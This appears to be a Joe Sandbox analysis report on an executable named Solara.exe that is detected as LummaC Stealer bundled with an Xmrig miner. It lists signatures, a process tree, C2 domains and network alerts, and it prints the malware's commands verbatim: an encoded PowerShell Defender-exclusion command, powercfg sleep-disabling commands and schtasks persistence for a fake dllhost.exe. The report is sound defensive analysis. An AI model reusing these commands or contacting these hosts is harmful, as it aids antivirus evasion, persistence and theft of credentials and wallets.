Edit tour

Windows Analysis Report
Solara.exe.bin.exe

Overview

General Information

Sample name:	Solara.exe.bin.exe
Analysis ID:	1638549
MD5:	5a09a42cffc878b0bb34d9795592a939
SHA1:	4d236b48e09f1a9b408ac8477f1919aea83a73d1
SHA256:	343db8302648e9993ba3455a5c5013c22e618b186f7bfdfb653f193e386b2559
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer, Xmrig

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Yara detected LummaC Stealer

Yara detected Xmrig cryptocurrency miner

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Contains functionality to inject code into remote processes

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Modifies power options to not sleep / hibernate

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses powercfg.exe to modify the power settings

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Suspicious Execution of Powershell with Base64

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Solara.exe.bin.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\Solara.exe.bin.exe" MD5: 5A09A42CFFC878B0BB34D9795592A939)

conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Solara.exe.bin.exe (PID: 5928 cmdline: "C:\Users\user\Desktop\Solara.exe.bin.exe" MD5: 5A09A42CFFC878B0BB34D9795592A939)

Z6T9189FJQPDA5HSM49.exe (PID: 6908 cmdline: "C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe" MD5: C11A82D699A06D9B8BA4296E0C562AE4)

cmd.exe (PID: 2688 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5940 cmdline: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

WmiPrvSE.exe (PID: 7208 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powercfg.exe (PID: 7440 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)

cmd.exe (PID: 7340 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7452 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7368 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7464 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

WerFault.exe (PID: 1764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 400 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 7592 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://harfanglab.io/insidethelab/unpacking-packxor/ https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.974422341.00000000011F8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1093031498.000000000328D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000002.00000002.2169158568.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000002.00000003.974203654.00000000011DD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Solara.exe.bin.exe PID: 5928	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: Solara.exe.bin.exe PID: 5928	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Z6T9189FJQPDA5HSM49.exe PID: 6908	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.Solara.exe.bin.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.Solara.exe.bin.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
8.2.Z6T9189FJQPDA5HSM49.exe.324777d.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe, ProcessId: 6908, TargetFilename: C:\ProgramData\Dllhost\dllhost.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe, ParentProcessId: 6908, ParentProcessName: Z6T9189FJQPDA5HSM49.exe, ProcessCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ProcessId: 2688, ProcessName: cmd.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , CommandLine: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2688, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , ProcessId: 5940, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , CommandLine: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2688, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , ProcessId: 5940, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7592, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe, ParentProcessId: 6908, ParentProcessName: Z6T9189FJQPDA5HSM49.exe, ProcessCommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", ProcessId: 7340, ProcessName: cmd.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:22:17.843558+0100	2028371	3	Unknown Traffic	192.168.2.8	49682	188.114.96.3	443	TCP
2025-03-14T14:22:19.456358+0100	2028371	3	Unknown Traffic	192.168.2.8	49684	188.114.96.3	443	TCP
2025-03-14T14:22:20.584810+0100	2028371	3	Unknown Traffic	192.168.2.8	49686	188.114.96.3	443	TCP
2025-03-14T14:22:21.746593+0100	2028371	3	Unknown Traffic	192.168.2.8	49690	188.114.96.3	443	TCP
2025-03-14T14:22:23.466843+0100	2028371	3	Unknown Traffic	192.168.2.8	49691	188.114.96.3	443	TCP
2025-03-14T14:22:25.007544+0100	2028371	3	Unknown Traffic	192.168.2.8	49692	188.114.96.3	443	TCP
2025-03-14T14:22:27.767167+0100	2028371	3	Unknown Traffic	192.168.2.8	49693	188.114.96.3	443	TCP

ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:22:33.625060+0100	2829056	2	Crypto Currency Mining Activity Detected	192.168.2.8	49697	185.215.113.51	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Solara.exe.bin.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://citydisco.bet:443/gdJISNz	Avira URL Cloud: Label: malware
Source: https://citydisco.bet/gdJISre	Avira URL Cloud: Label: malware
Source: https://citydisco.bet/02	Avira URL Cloud: Label: malware
Source: https://citydisco.bet/f3	Avira URL Cloud: Label: malware
Source: https://citydisco.bet/gdJISjkJvr	Avira URL Cloud: Label: malware
Source: https://citydisco.bet/gdJISdtzYrvZ	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe

ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: Solara.exe.bin.exe	Virustotal: Detection: 76%			Perma Link
Source: Solara.exe.bin.exe	ReversingLabs: Detection: 76%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: citydisco.bet/gdJIS
Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: featureccus.shop/bdMAn
Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mrodularmall.top/aNzS
Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jowinjoinery.icu/bdWUa
Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: legenassedk.top/bdpWO
Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: htardwarehu.icu/Sbdsa
Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cjlaspcorne.icu/DbIps
Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 2_2_0041BAC1 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,

2_2_0041BAC1

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 8.2.Z6T9189FJQPDA5HSM49.exe.324777d.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1093031498.000000000328D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Solara.exe.bin.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Z6T9189FJQPDA5HSM49.exe PID: 6908, type: MEMORYSTR

Source: Solara.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49693 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49695 version: TLS 1.2

Source: Solara.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Solara.exe.bin.exe, 00000002.00000003.1636690920.0000000001266000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000000.1036685128.0000000000E22000.00000002.00000001.01000000.00000006.sdmp, Z6T9189FJQPDA5HSM49.exe.2.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.8.dr

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0094FCDE FindFirstFileExW,	0_2_0094FCDE
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0094FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_0094FD8F
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0094FCDE FindFirstFileExW,	2_2_0094FCDE
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0094FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_0094FD8F

